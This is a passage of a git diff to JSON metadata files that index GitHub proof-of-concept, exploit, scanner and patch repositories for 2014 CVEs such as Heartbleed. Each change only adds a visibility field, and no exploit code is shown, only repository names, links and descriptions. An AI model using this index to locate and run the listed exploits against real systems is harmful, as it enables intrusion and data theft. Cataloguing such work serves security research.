"https:\/\/github.com\/hybridus\/heartbleedscanner", "description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ", @@ -1246,7 +1287,8 @@ "login": "froyo75", "id": 8553697, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8553697?v=4", - "html_url": "https:\/\/github.com\/froyo75" + "html_url": "https:\/\/github.com\/froyo75", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/froyo75\/Heartbleed_Dockerfile_with_Nginx", "description": "Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.", @@ -1276,7 +1318,8 @@ "login": "Xyl2k", "id": 8536299, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8536299?v=4", - "html_url": "https:\/\/github.com\/Xyl2k" + "html_url": "https:\/\/github.com\/Xyl2k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin", "description": "Heartbleed", @@ -1306,7 +1349,8 @@ "login": "caiqiqi", "id": 8278315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8278315?v=4", - "html_url": "https:\/\/github.com\/caiqiqi" + "html_url": "https:\/\/github.com\/caiqiqi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC", "description": "来自:https:\/\/www.freebuf.com\/articles\/web\/31700.html", @@ -1336,7 +1380,8 @@ "login": "Saymeis", "id": 42687972, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42687972?v=4", - "html_url": "https:\/\/github.com\/Saymeis" + "html_url": "https:\/\/github.com\/Saymeis", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Saymeis\/HeartBleed", "description": "CVE-2014-0160", @@ -1366,7 +1411,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160", "description": "cve-2014-0160", @@ -1396,7 +1442,8 @@ "login": "cheese-hub", "id": 41589726, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589726?v=4", - "html_url": "https:\/\/github.com\/cheese-hub" + "html_url": "https:\/\/github.com\/cheese-hub", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cheese-hub\/heartbleed", "description": "Demonstration of the Heartbleed Bug CVE-2014-0160", @@ -1426,7 +1473,8 @@ "login": "artofscripting-zz", "id": 1545672, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1545672?v=4", - "html_url": "https:\/\/github.com\/artofscripting-zz" + "html_url": "https:\/\/github.com\/artofscripting-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS", "description": null, @@ -1456,7 +1504,8 @@ "login": "cldme", "id": 10621824, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10621824?v=4", - "html_url": "https:\/\/github.com\/cldme" + "html_url": "https:\/\/github.com\/cldme", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cldme\/heartbleed-bug", "description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔", @@ -1486,7 +1535,8 @@ "login": "ThanHuuTuan", "id": 32167814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", - "html_url": "https:\/\/github.com\/ThanHuuTuan" + "html_url": "https:\/\/github.com\/ThanHuuTuan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit", "description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.", @@ -1516,7 +1566,8 @@ "login": "rouze-d", "id": 50823809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50823809?v=4", - "html_url": "https:\/\/github.com\/rouze-d" + "html_url": "https:\/\/github.com\/rouze-d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rouze-d\/heartbleed", "description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)", @@ -1546,7 +1597,8 @@ "login": "WildfootW", "id": 11520473, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4", - "html_url": "https:\/\/github.com\/WildfootW" + "html_url": "https:\/\/github.com\/WildfootW", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed", "description": null, @@ -1576,7 +1628,8 @@ "login": "GuillermoEscobero", "id": 15904345, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904345?v=4", - "html_url": "https:\/\/github.com\/GuillermoEscobero" + "html_url": "https:\/\/github.com\/GuillermoEscobero", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GuillermoEscobero\/heartbleed", "description": "CVE-2014-0160 OpenSSL Heartbleed Proof of Concept", @@ -1606,7 +1659,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", @@ -1636,7 +1690,8 @@ "login": "ingochris", "id": 2686679, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2686679?v=4", - "html_url": "https:\/\/github.com\/ingochris" + "html_url": "https:\/\/github.com\/ingochris", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ingochris\/heartpatch.us", "description": "OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.", @@ -1671,7 +1726,8 @@ "login": "belmind", "id": 22224799, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22224799?v=4", - "html_url": "https:\/\/github.com\/belmind" + "html_url": "https:\/\/github.com\/belmind", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/belmind\/heartbleed", "description": "A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸", @@ -1703,7 +1759,8 @@ "login": "pierceoneill", "id": 37594104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37594104?v=4", - "html_url": "https:\/\/github.com\/pierceoneill" + "html_url": "https:\/\/github.com\/pierceoneill", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pierceoneill\/bleeding-heart", "description": "The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL\/TLS to keep the connection alive.", @@ -1733,7 +1790,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2014-0160_Heartbleed", "description": null, @@ -1763,7 +1821,8 @@ "login": "GardeniaWhite", "id": 50975594, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50975594?v=4", - "html_url": "https:\/\/github.com\/GardeniaWhite" + "html_url": "https:\/\/github.com\/GardeniaWhite", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GardeniaWhite\/fuzzing", "description": "fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160)", @@ -1793,7 +1852,8 @@ "login": "undacmic", "id": 46650582, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46650582?v=4", - "html_url": "https:\/\/github.com\/undacmic" + "html_url": "https:\/\/github.com\/undacmic", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/undacmic\/heartbleed-proof-of-concept", "description": "Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:", @@ -1831,7 +1891,8 @@ "login": "cbk914", "id": 2042196, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", - "html_url": "https:\/\/github.com\/cbk914" + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cbk914\/heartbleed-checker", "description": "Check for CVE-2014-0160 ", @@ -1861,7 +1922,8 @@ "login": "MrE-Fog", "id": 114317320, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114317320?v=4", - "html_url": "https:\/\/github.com\/MrE-Fog" + "html_url": "https:\/\/github.com\/MrE-Fog", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MrE-Fog\/CVE-2014-0160-Chrome-Plugin", "description": null, @@ -1891,7 +1953,8 @@ "login": "timsonner", "id": 66705347, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66705347?v=4", - "html_url": "https:\/\/github.com\/timsonner" + "html_url": "https:\/\/github.com\/timsonner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timsonner\/cve-2014-0160-heartbleed", "description": null, @@ -1921,7 +1984,8 @@ "login": "Yash-Thakkar77", "id": 117845673, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117845673?v=4", - "html_url": "https:\/\/github.com\/Yash-Thakkar77" + "html_url": "https:\/\/github.com\/Yash-Thakkar77", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Yash-Thakkar77\/CVE-2014-0160-HeartBleed", "description": null, diff --git a/2014/CVE-2014-0166.json b/2014/CVE-2014-0166.json index 3561620e41..47e869cb0a 100644 --- a/2014/CVE-2014-0166.json +++ b/2014/CVE-2014-0166.json @@ -7,7 +7,8 @@ "login": "Ettack", "id": 4652366, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4652366?v=4", - "html_url": "https:\/\/github.com\/Ettack" + "html_url": "https:\/\/github.com\/Ettack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ettack\/POC-CVE-2014-0166", "description": "POC of CVE-2014-0166 (WordPress cookie forgery vulnerability)", diff --git a/2014/CVE-2014-0195.json b/2014/CVE-2014-0195.json index 4f7b73b71c..cf882d3dd7 100644 --- a/2014/CVE-2014-0195.json +++ b/2014/CVE-2014-0195.json @@ -7,7 +7,8 @@ "login": "ricedu", "id": 7359760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7359760?v=4", - "html_url": "https:\/\/github.com\/ricedu" + "html_url": "https:\/\/github.com\/ricedu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ricedu\/CVE-2014-0195", "description": "OpenSSL heap overflow PoC (CVE-2014-0195)", diff --git a/2014/CVE-2014-0196.json b/2014/CVE-2014-0196.json index ba24ebc7ea..6031ba060f 100644 --- a/2014/CVE-2014-0196.json +++ b/2014/CVE-2014-0196.json @@ -7,7 +7,8 @@ "login": "SunRain", "id": 864544, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/864544?v=4", - "html_url": "https:\/\/github.com\/SunRain" + "html_url": "https:\/\/github.com\/SunRain", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SunRain\/CVE-2014-0196", "description": null, @@ -37,7 +38,8 @@ "login": "tempbottle", "id": 1203820, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1203820?v=4", - "html_url": "https:\/\/github.com\/tempbottle" + "html_url": "https:\/\/github.com\/tempbottle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tempbottle\/CVE-2014-0196", "description": "CVE-2014-0196: Linux kernel pty layer race condition memory corruption", diff --git a/2014/CVE-2014-0224.json b/2014/CVE-2014-0224.json index 51b9f95b45..dd9884f8fa 100644 --- a/2014/CVE-2014-0224.json +++ b/2014/CVE-2014-0224.json @@ -7,7 +7,8 @@ "login": "Tripwire", "id": 4419286, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4419286?v=4", - "html_url": "https:\/\/github.com\/Tripwire" + "html_url": "https:\/\/github.com\/Tripwire", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Tripwire\/OpenSSL-CCS-Inject-Test", "description": "This script is designed for detection of vulnerable servers (CVE-2014-0224.) in a wide range of configurations. It attempts to negotiate using each affected protocol version (SSLv3, TLSv1, TLSv1.1, and TLSv1.2) advertising a comprehensive set of ciphers.", @@ -37,7 +38,8 @@ "login": "iph0n3", "id": 1528152, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1528152?v=4", - "html_url": "https:\/\/github.com\/iph0n3" + "html_url": "https:\/\/github.com\/iph0n3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/iph0n3\/CVE-2014-0224", "description": null, @@ -67,7 +69,8 @@ "login": "droptables", "id": 5084547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5084547?v=4", - "html_url": "https:\/\/github.com\/droptables" + "html_url": "https:\/\/github.com\/droptables", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/droptables\/ccs-eval", "description": "Used for evaluating hosts for CVE-2014-0224", @@ -97,7 +100,8 @@ "login": "ssllabs", "id": 1774628, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1774628?v=4", - "html_url": "https:\/\/github.com\/ssllabs" + "html_url": "https:\/\/github.com\/ssllabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ssllabs\/openssl-ccs-cve-2014-0224", "description": null, @@ -127,7 +131,8 @@ "login": "secretnonempty", "id": 1168808, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1168808?v=4", - "html_url": "https:\/\/github.com\/secretnonempty" + "html_url": "https:\/\/github.com\/secretnonempty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/secretnonempty\/CVE-2014-0224", "description": null, diff --git a/2014/CVE-2014-0226.json b/2014/CVE-2014-0226.json index 9b2b88e486..68880a23dc 100644 --- a/2014/CVE-2014-0226.json +++ b/2014/CVE-2014-0226.json @@ -7,7 +7,8 @@ "login": "shreesh1", "id": 13206227, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13206227?v=4", - "html_url": "https:\/\/github.com\/shreesh1" + "html_url": "https:\/\/github.com\/shreesh1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shreesh1\/CVE-2014-0226-poc", "description": null, diff --git a/2014/CVE-2014-0282.json b/2014/CVE-2014-0282.json index c898d30feb..b21b6fa37e 100644 --- a/2014/CVE-2014-0282.json +++ b/2014/CVE-2014-0282.json @@ -7,7 +7,8 @@ "login": "Charmve", "id": 29084184, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29084184?v=4", - "html_url": "https:\/\/github.com\/Charmve" + "html_url": "https:\/\/github.com\/Charmve", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Charmve\/PyStegosploit", "description": "PoC - Exploit Delivery via Steganography and Polyglots, CVE-2014-0282", diff --git a/2014/CVE-2014-0291.json b/2014/CVE-2014-0291.json index 81a474be46..e174d67557 100644 --- a/2014/CVE-2014-0291.json +++ b/2014/CVE-2014-0291.json @@ -7,7 +7,8 @@ "login": "niccoX", "id": 10669660, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10669660?v=4", - "html_url": "https:\/\/github.com\/niccoX" + "html_url": "https:\/\/github.com\/niccoX", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/niccoX\/patch-openssl-CVE-2014-0291_CVE-2015-0204", "description": null, diff --git a/2014/CVE-2014-0472.json b/2014/CVE-2014-0472.json index 476c1c8b62..99001da909 100644 --- a/2014/CVE-2014-0472.json +++ b/2014/CVE-2014-0472.json @@ -7,7 +7,8 @@ "login": "christasa", "id": 35037256, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35037256?v=4", - "html_url": "https:\/\/github.com\/christasa" + "html_url": "https:\/\/github.com\/christasa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/christasa\/CVE-2014-0472", "description": "CVE-2014-0472 Django unexpected code execution using reverse()", diff --git a/2014/CVE-2014-0521.json b/2014/CVE-2014-0521.json index 6d1064b545..cdb9e1b4cd 100644 --- a/2014/CVE-2014-0521.json +++ b/2014/CVE-2014-0521.json @@ -7,7 +7,8 @@ "login": "molnarg", "id": 894421, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/894421?v=4", - "html_url": "https:\/\/github.com\/molnarg" + "html_url": "https:\/\/github.com\/molnarg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/molnarg\/cve-2014-0521", "description": null, diff --git a/2014/CVE-2014-0816.json b/2014/CVE-2014-0816.json index 859cefc0a8..c02cf79f59 100644 --- a/2014/CVE-2014-0816.json +++ b/2014/CVE-2014-0816.json @@ -7,7 +7,8 @@ "login": "tandasat", "id": 1620923, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", - "html_url": "https:\/\/github.com\/tandasat" + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tandasat\/CVE-2014-0816", "description": "CVE-2014-0816", diff --git a/2014/CVE-2014-0993.json b/2014/CVE-2014-0993.json index f8cd2f03b2..4317a0b42c 100644 --- a/2014/CVE-2014-0993.json +++ b/2014/CVE-2014-0993.json @@ -7,7 +7,8 @@ "login": "helpsystems", "id": 49566054, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49566054?v=4", - "html_url": "https:\/\/github.com\/helpsystems" + "html_url": "https:\/\/github.com\/helpsystems", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/helpsystems\/Embarcadero-Workaround", "description": "This is a workaround for CVE-2014-0993 and CVE-2014-0994 that patches on memory without the need to recompile your vulnerable software. This is not the Embarcadero official fix, this is only CORE Security workaround.", diff --git a/2014/CVE-2014-10069.json b/2014/CVE-2014-10069.json index 4947c2a9e0..3f345ce3f7 100644 --- a/2014/CVE-2014-10069.json +++ b/2014/CVE-2014-10069.json @@ -7,7 +7,8 @@ "login": "aimoda", "id": 96030190, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96030190?v=4", - "html_url": "https:\/\/github.com\/aimoda" + "html_url": "https:\/\/github.com\/aimoda", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aimoda\/hitron-cfg-decrypter", "description": "CVE-2014-10069", diff --git a/2014/CVE-2014-1266.json b/2014/CVE-2014-1266.json index 2c8d0de1d1..59cce076c0 100644 --- a/2014/CVE-2014-1266.json +++ b/2014/CVE-2014-1266.json @@ -7,7 +7,8 @@ "login": "landonf", "id": 18884, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18884?v=4", - "html_url": "https:\/\/github.com\/landonf" + "html_url": "https:\/\/github.com\/landonf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/landonf\/Testability-CVE-2014-1266", "description": "Demonstrating that SSLVerifySignedServerKeyExchange() is trivially testable.", @@ -37,7 +38,8 @@ "login": "linusyang", "id": 1445849, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1445849?v=4", - "html_url": "https:\/\/github.com\/linusyang" + "html_url": "https:\/\/github.com\/linusyang", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/linusyang\/SSLPatch", "description": "Patch iOS SSL vulnerability (CVE-2014-1266)", @@ -67,7 +69,8 @@ "login": "gabrielg", "id": 3902, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3902?v=4", - "html_url": "https:\/\/github.com\/gabrielg" + "html_url": "https:\/\/github.com\/gabrielg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gabrielg\/CVE-2014-1266-poc", "description": "Apple OS X\/iOS SSL flaw demonstration", @@ -97,7 +100,8 @@ "login": "meetlight942", "id": 175837616, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175837616?v=4", - "html_url": "https:\/\/github.com\/meetlight942" + "html_url": "https:\/\/github.com\/meetlight942", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/meetlight942\/PentesterLab-Intercept-CVE-2014-1266", "description": null, diff --git a/2014/CVE-2014-1303.json b/2014/CVE-2014-1303.json index 9ea8bdbdb1..c16f9efd86 100644 --- a/2014/CVE-2014-1303.json +++ b/2014/CVE-2014-1303.json @@ -7,7 +7,8 @@ "login": "RKX1209", "id": 964758, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/964758?v=4", - "html_url": "https:\/\/github.com\/RKX1209" + "html_url": "https:\/\/github.com\/RKX1209", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RKX1209\/CVE-2014-1303", "description": "CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux", diff --git a/2014/CVE-2014-1322.json b/2014/CVE-2014-1322.json index f7c5dab201..85b3f64e82 100644 --- a/2014/CVE-2014-1322.json +++ b/2014/CVE-2014-1322.json @@ -7,7 +7,8 @@ "login": "raymondpittman", "id": 6395348, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6395348?v=4", - "html_url": "https:\/\/github.com\/raymondpittman" + "html_url": "https:\/\/github.com\/raymondpittman", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/raymondpittman\/IPC-Memory-Mac-OSX-Exploit", "description": "CVE-2014-1322 - IPC Local Security Bypass | Mac OSX (Affected. >= 10.9.2)", diff --git a/2014/CVE-2014-1447.json b/2014/CVE-2014-1447.json index da97adf4f8..1eef802573 100644 --- a/2014/CVE-2014-1447.json +++ b/2014/CVE-2014-1447.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/libvirt-CVE-2014-1447", "description": "Libvirt - Unauthenticated DoS Vulnerability (Exploit & Time Randomization to Thwart It)", diff --git a/2014/CVE-2014-160.json b/2014/CVE-2014-160.json index 4e14c44d95..23ecaa015c 100644 --- a/2014/CVE-2014-160.json +++ b/2014/CVE-2014-160.json @@ -7,7 +7,8 @@ "login": "menrcom", "id": 945008, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/945008?v=4", - "html_url": "https:\/\/github.com\/menrcom" + "html_url": "https:\/\/github.com\/menrcom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/menrcom\/CVE-2014-160", "description": "CVE-2014-160 exploit", @@ -37,7 +38,8 @@ "login": "GitMirar", "id": 7244383, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7244383?v=4", - "html_url": "https:\/\/github.com\/GitMirar" + "html_url": "https:\/\/github.com\/GitMirar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GitMirar\/heartbleed_exploit", "description": "Exploit for CVE-2014-160 (heartbleed) with required patch for libopenssl", diff --git a/2014/CVE-2014-1677.json b/2014/CVE-2014-1677.json index 8aae78528c..70c7d33f0c 100644 --- a/2014/CVE-2014-1677.json +++ b/2014/CVE-2014-1677.json @@ -7,7 +7,8 @@ "login": "tihmstar", "id": 1363935, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1363935?v=4", - "html_url": "https:\/\/github.com\/tihmstar" + "html_url": "https:\/\/github.com\/tihmstar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tihmstar\/freePW_tc7200Eploit", "description": "Technicolor TC7200 - Credentials Disclosure CVE : CVE-2014-1677", diff --git a/2014/CVE-2014-1767.json b/2014/CVE-2014-1767.json index 74f39922fa..a4ac9bd2ec 100644 --- a/2014/CVE-2014-1767.json +++ b/2014/CVE-2014-1767.json @@ -7,7 +7,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2014-1767-EXP-PAPER", "description": "CVE-2014-1767在win7_x64平台的EXP和分析文章", diff --git a/2014/CVE-2014-1773.json b/2014/CVE-2014-1773.json index 6b9e628ca8..f847c13a7b 100644 --- a/2014/CVE-2014-1773.json +++ b/2014/CVE-2014-1773.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-1773", "description": null, diff --git a/2014/CVE-2014-1812.json b/2014/CVE-2014-1812.json index ddf8a791d5..acd424f1b0 100644 --- a/2014/CVE-2014-1812.json +++ b/2014/CVE-2014-1812.json @@ -7,7 +7,8 @@ "login": "mauricelambert", "id": 50479118, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", - "html_url": "https:\/\/github.com\/mauricelambert" + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mauricelambert\/gpp-encrypt", "description": "This little script encrypts password to gpp cpassword. It useful to create vulnerable lab AD (CVE-2014-1812).", diff --git a/2014/CVE-2014-2064.json b/2014/CVE-2014-2064.json index 97a24b371e..13c42139be 100644 --- a/2014/CVE-2014-2064.json +++ b/2014/CVE-2014-2064.json @@ -7,7 +7,8 @@ "login": "Naramsim", "id": 8996268, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996268?v=4", - "html_url": "https:\/\/github.com\/Naramsim" + "html_url": "https:\/\/github.com\/Naramsim", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Naramsim\/Offensive", "description": "Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904", diff --git a/2014/CVE-2014-2321.json b/2014/CVE-2014-2321.json index 583e3fc246..db2371dc66 100644 --- a/2014/CVE-2014-2321.json +++ b/2014/CVE-2014-2321.json @@ -7,7 +7,8 @@ "login": "injectionmethod", "id": 80434330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80434330?v=4", - "html_url": "https:\/\/github.com\/injectionmethod" + "html_url": "https:\/\/github.com\/injectionmethod", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/injectionmethod\/ZTE-Vuln-4-Skids", "description": "Archive: Exploit https:\/\/www.cvedetails.com\/cve\/CVE-2014-2321\/ For CentOS", @@ -45,7 +46,8 @@ "login": "injectionmethod", "id": 80434330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80434330?v=4", - "html_url": "https:\/\/github.com\/injectionmethod" + "html_url": "https:\/\/github.com\/injectionmethod", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/injectionmethod\/Windows-ZTE-Loader", "description": "Windows ZTE Loader CVE-2014-2321 Requires ZMAP For Windows Or BigEar", diff --git a/2014/CVE-2014-2323.json b/2014/CVE-2014-2323.json index 3679656d60..16fdaf178b 100644 --- a/2014/CVE-2014-2323.json +++ b/2014/CVE-2014-2323.json @@ -7,7 +7,8 @@ "login": "cirocosta", "id": 3574444, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3574444?v=4", - "html_url": "https:\/\/github.com\/cirocosta" + "html_url": "https:\/\/github.com\/cirocosta", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cirocosta\/lighty-sqlinj-demo", "description": "CVE-2014-2323 exploit demonstration", diff --git a/2014/CVE-2014-2324.json b/2014/CVE-2014-2324.json index 7c461a3c04..a86ae35ced 100644 --- a/2014/CVE-2014-2324.json +++ b/2014/CVE-2014-2324.json @@ -7,7 +7,8 @@ "login": "sp4c30x1", "id": 33990446, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33990446?v=4", - "html_url": "https:\/\/github.com\/sp4c30x1" + "html_url": "https:\/\/github.com\/sp4c30x1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sp4c30x1\/uc_httpd_exploit", "description": "Simple uc httpd exploit made with py3.. this exploit was written from CVE-2014-2324", diff --git a/2014/CVE-2014-2383.json b/2014/CVE-2014-2383.json index 647950daa2..f5443647d0 100644 --- a/2014/CVE-2014-2383.json +++ b/2014/CVE-2014-2383.json @@ -7,7 +7,8 @@ "login": "Relativ3Pa1n", "id": 87828878, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87828878?v=4", - "html_url": "https:\/\/github.com\/Relativ3Pa1n" + "html_url": "https:\/\/github.com\/Relativ3Pa1n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Relativ3Pa1n\/CVE-2014-2383-LFI-to-RCE-Escalation", "description": null, diff --git a/2014/CVE-2014-2630.json b/2014/CVE-2014-2630.json index 87a80304fa..6490459c81 100644 --- a/2014/CVE-2014-2630.json +++ b/2014/CVE-2014-2630.json @@ -7,7 +7,8 @@ "login": "redtimmy", "id": 40774163, "avatar_url": 